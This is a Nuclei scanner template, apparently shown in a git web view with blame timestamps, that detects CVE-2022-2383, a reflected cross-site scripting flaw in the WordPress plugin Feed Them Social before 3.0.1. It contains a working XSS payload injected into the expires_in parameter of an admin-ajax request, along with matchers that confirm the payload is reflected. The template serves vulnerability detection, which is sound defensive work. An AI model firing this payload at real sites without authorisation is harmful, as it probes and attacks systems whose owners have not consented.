nuclei-templates/cves/2022/CVE-2022-2383.yaml

39 lines
1.1 KiB
YAML
Raw Normal View History

2022-08-25 15:48:37 +00:00
id: CVE-2022-2383
info:
name: Feed Them Social < 3.0.1 - Cross-Site Scripting
author: akincibor
severity: medium
description: |
The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.
reference:
- https://wpscan.com/vulnerability/4a3b3023-e740-411c-a77c-6477b80d7531
2022-08-25 15:54:04 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2383
2022-08-25 15:48:37 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-2383
classification:
cve-id: CVE-2022-2383
metadata:
verified: true
tags: xss,wp,wordpress,wp-plugin
requests:
- method: GET
path:
2022-08-25 15:53:08 +00:00
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E'
2022-08-25 15:48:37 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src onerror=alert(document.domain)><br/>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200